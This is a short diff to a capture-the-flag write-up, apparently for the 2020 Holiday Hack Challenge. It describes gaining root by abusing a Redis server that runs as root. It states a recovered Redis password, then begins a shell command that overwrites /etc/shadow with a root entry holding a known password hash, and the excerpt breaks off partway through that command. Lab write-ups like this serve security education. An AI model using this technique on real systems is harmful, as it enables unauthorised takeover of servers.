joergschwarzwaelder/hhc2020/Additional/Redis Bug Hunt.md

 ## Approach 2: Become root
 The Redis password can be found with the above method in the file maintenance.php, it is `R3disp@ss`.
+As the Redis server is running as `root` we can overwrite `/etc/shadow` with new content.
+The `root` user's password is set to `Marie`.
 ```
 echo "\n\n
 root:cbMHDguL1fenw:16928:0:99999:7:::